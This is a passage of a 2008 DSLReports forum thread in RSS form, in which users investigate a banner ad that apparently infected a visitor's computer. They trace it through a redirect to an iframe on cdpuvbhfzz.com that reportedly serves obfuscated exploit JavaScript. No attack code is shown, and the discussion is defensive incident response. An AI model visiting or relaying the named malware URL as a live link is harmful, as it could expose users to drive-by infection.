<description><![CDATA[<A HREF="/useremail/u/170376"><b>cabana</b></A> : I recreated similar ads with the coloring and "feel" -- but I am not sure if they are related -- properties showed:<br><br>pagead2.googlesyndication.com/pagead/imgad?id=CJ_1t5_n5bHiowEQ2AUYTzIIQhaO6-aqw3E<br><br>pagead2.googlesyndication.com/pagead/imgad?id=CPvFnZC4uc-M0AEQ2AUYTzIIxm5IBBA487w<br><br>pagead2.googlesyndication.com/pagead/imgad?id=CPvFnZC4uc-M0AEQ2AUYTzIIxm5IBBA487w<br><br>The thing I noticed on the screenshot that was strange - was to the right the "served by google" was missing (usually shows next to our banners on the homepage)-- could be that it was there and just not caught on the screen shot.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20340746</guid>
<pubDate>Tue, 15 Apr 2008 22:15:02 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20340743</link>
<description><![CDATA[<A HREF="/useremail/u/1"><b>justin</b></A> : I've blocked eskimo.com and also emailed our adsense rep with a complaint. Unfortunately I really don't see how this can be avoided in future. I doubt any ad network is smart enough to vet and clean the click stream from any ad, and if they did when the ad was lodged what is to stop the landing page getting modified later?]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20340743</guid>
<pubDate>Tue, 15 Apr 2008 22:14:11 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20340709</link>
<description><![CDATA[<A HREF="/useremail/u/1070900"><b>nwrickert</b></A> : I can reproduce the original url (to googlesyndication) if that's any help]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20340709</guid>
<pubDate>Tue, 15 Apr 2008 22:09:04 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20340681</link>
<description><![CDATA[<A HREF="/useremail/u/1"><b>justin</b></A> : If you can make the ad appear again, can you click the "ads by google" link at the right and drill down, open up and keep drilling until you get the part where you can report a bad ad to adsense?]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20340681</guid>
<pubDate>Tue, 15 Apr 2008 22:03:57 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20340636</link>
<description><![CDATA[<A HREF="/useremail/u/251107"><b>nil</b></A> : Based on a brief google search, it appears to be an exploit script targeting word press, vbulletin, coppermine, etc. Php exploit, maybe? <br><small>--<br>Life is too short to be <A HREF="http://www.unix-girl.com/blog/">boring</a></small>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20340636</guid>
<pubDate>Tue, 15 Apr 2008 21:54:45 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20340623</link>
<description><![CDATA[<A HREF="/useremail/u/197199"><b>Doctor Four</b></A> : Linkscanner doesn't like that ad's URL:<br>&raquo;<A HREF="http://linkscanner.explabs.com/linkscanner/checksite.asp?NS=ChkOnly&SRC=apps.ExpLabs.com&CS=http://www.eskimo.com/dsl/?gclid=CIi9u9613pICFQMelgodJlsH-g" >linkscanner.explabs.com/linkscan&middot;&middot;&middot;odJlsH-g</A><br><br>Nor does it like the one in the iframe, which it says is<br>on a disreputable hosting provider, known to host malicious<br>code.<br><br>It calls the former an orphaned lure site.<br><br>The iframe one's WHOIS data:<br><br><textarea name="code" class="text" cols=50 rows=10>OrgName:    RIPE Network Coordination Centre &#012;OrgID:      RIPE&#012;Address:    P.O. Box 10096&#012;City:       Amsterdam&#012;StateProv:  &#012;PostalCode: 1001EB&#012;Country:    NL&#012; &#012;ReferralServer: whois://whois.ripe.net:43&#012; &#012;NetRange:   85.0.0.0 - 85.255.255.255 &#012;CIDR:       85.0.0.0/8 &#012;NetName:    85-RIPE&#012;NetHandle:  NET-85-0-0-0-1&#012;Parent:     &#012;NetType:    Allocated to RIPE NCC&#012;NameServer: NS-PRI.RIPE.NET&#012;NameServer: NS3.NIC.FR&#012;NameServer: SEC1.APNIC.NET&#012;NameServer: SEC3.APNIC.NET&#012;NameServer: SUNIC.SUNET.SE&#012;NameServer: TINNIE.ARIN.NET&#012;NameServer: NS.LACNIC.NET&#012;Comment:    These addresses have been further assigned to users in&#012;Comment:    the RIPE NCC region. Contact information can be found in&#012;Comment:    the RIPE database at http://www.ripe.net/whois&#012;RegDate:    2004-04-01&#012;Updated:    2004-04-06&#012;</textarea><!--end code block--><br><small>--<br>"The trouble with computers, of course, is that they are very sophisticated idiots." - Doctor Who (from Robot)<br></small>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20340623</guid>
<pubDate>Tue, 15 Apr 2008 21:50:46 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20340611</link>
<description><![CDATA[<A HREF="/useremail/u/251107"><b>nil</b></A> : Domain created 3/31/08.. so looks recent. <br><br>Domain name: cdpuvbhfzz.com<br>er, removed domain info.. see this: <br><br>&raquo;<A HREF="http://www.chiriquichatter.net/blog/2008/04/12/an" >www.chiriquichatter.net/blog/2008/04/12/an</A><br><small>--<br>Life is too short to be <A HREF="http://www.unix-girl.com/blog/">boring</a></small>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20340611</guid>
<pubDate>Tue, 15 Apr 2008 21:48:34 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20340601</link>
<description><![CDATA[<A HREF="/useremail/u/611455"><b>skj</b></A> : Yes, it is. That thread was also posted today, so it looks like this nasty may have recently started ciruclating around the net. <br><small>--<br><br> <br> The foundations of character are built not by lecture, but by bricks of good example, laid day by day.</small>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20340601</guid>
<pubDate>Tue, 15 Apr 2008 21:47:19 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20340552</link>
<description><![CDATA[<A HREF="/useremail/u/1070900"><b>nwrickert</b></A> : Thanks for that CastleCops reference.  Quite interesting.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20340552</guid>
<pubDate>Tue, 15 Apr 2008 21:37:01 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20340519</link>
<description><![CDATA[<A HREF="/useremail/u/611455"><b>skj</b></A> : There is a thread at CastleCops regarding: cdpuvbhfzz.com<br><br>http://www.castlecops.com/p1079008-iframe_loading_hxxp_cdpuvbhfzz_com_dl_adv598_php.html<br><small>--<br><br> <br> The foundations of character are built not by lecture, but by bricks of good example, laid day by day.</small>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20340519</guid>
<pubDate>Tue, 15 Apr 2008 21:30:37 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20340495</link>
<description><![CDATA[<A HREF="/useremail/u/1070900"><b>nwrickert</b></A> : The main link redirects to http&#58;//www.eskimo.com/dsl/?gclid=CMbU0pK03pICFQhusgodDghp-w and there is a suspicious iframe near the end of that page.<br><br>iframe content is http&#58;//cdpuvbhfzz.com/dl/adv598.php and that contains obfuscated javascript.<br><small>--<br>AT&T dsl; Westell 327w modem/router; SuSE 10.1; firefox 2.0.0.13</small>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20340495</guid>
<pubDate>Tue, 15 Apr 2008 21:26:42 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20340483</link>
<description><![CDATA[<A HREF="/useremail/u/502502"><b>n1zuk</b></A> : I saw it earlier, when I was at work.  I (thankfully) didn't click on it.  <br><br>It did seem out of the normal to me...<br><small>--<br><A HREF="http://www.albinoblacksheep.com/flash/posting.php">New to Forum Life?  Click here and learn.</a></small>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20340483</guid>
<pubDate>Tue, 15 Apr 2008 21:24:17 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20340468</link>
<description><![CDATA[<A HREF="/useremail/u/251107"><b>nil</b></A> : I just got a similar one.. <br><br>Yah, same one leads here: <br><textarea name="code" class="text" cols=50 rows=10>http://www.eskimo.com/dsl/?gclid=CIi9u9613pICFQMelgodJlsH-g&#012;</textarea><!--end code block--><br>Can anyone confirm any issue? I'm on a mac.. <br><small>--<br>Life is too short to be <A HREF="http://www.unix-girl.com/blog/">boring</a></small><div class="borderless"><TABLE WIDTH=95% align=center border=0 CELLPADDING=4"><TR><TD ALIGN=CENTER VALIGN=CENTER BGCOLOR=#000000 nwrap COLSPAN=3 WIDTH=100%><A HREF="/speak/slideshow/20340468?c=1297926&ret=L2ZvcnVtL3IyMDM0MDQ4My54bWw%3D"><IMG class="apic" BORDER=0 TITLE="133397 bytes" WIDTH=600 HEIGHT=119 SRC="/r0/download/1297926.thumb600~87a5ccc7798715667f98b2e3e9e4f425/Picture 1.png/thumb.jpg" ALT="Click for full size"></A></TD></TABLE></div>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20340468</guid>
<pubDate>Tue, 15 Apr 2008 21:22:16 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20340435</link>
<description><![CDATA[<A HREF="/useremail/u/1531837"><b>Its a Secret</b></A> : I've sent a request to have this looked at by the mods. Hopefully, we'll know something soon...<br><small>--<br>A triple espresso, please...</small>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20340435</guid>
<pubDate>Tue, 15 Apr 2008 21:16:51 EDT</pubDate>
</item>

<item>
<title>Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20340373</link>
<description><![CDATA[<A HREF="/useremail/u/1"><b>justin</b></A> : from a non registered user, complaint sent by email..<br><br><i><br>I clicked on the banner ad and my pc is completely unusable now. Trojans, viruses, etc.  My Symanetc Corp 10 and spybot lit up like fireworks were goin off.   Whats the story here?  Can you help?  I just fucked my work PC.  How can this happen on a trusted site like dslreports?  What now?<br></i><br><br>I don't recognize that advert but maybe someone here knows where it goes to so I can tell this person whether it is really malware or not..<div class="borderless"><TABLE WIDTH=95% align=center border=0 CELLPADDING=4"><TR><TD ALIGN=CENTER VALIGN=CENTER BGCOLOR=#000000 nwrap COLSPAN=3 WIDTH=100%><A HREF="/speak/slideshow/20340373?c=1297919&ret=L2ZvcnVtL3IyMDM0MDQ4My54bWw%3D"><IMG class="apic" BORDER=0 TITLE="223822 bytes" WIDTH=600 HEIGHT=443 SRC="/r0/download/1297919.thumb600~f6fa556f6a759f3fd573282b521e9f7b/image002.jpg/thumb.jpg" ALT="Click for full size"></A></TD></TABLE></div>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20340373</guid>
<pubDate>Tue, 15 Apr 2008 21:05:43 EDT</pubDate>
</item>

</channel>
</rss>
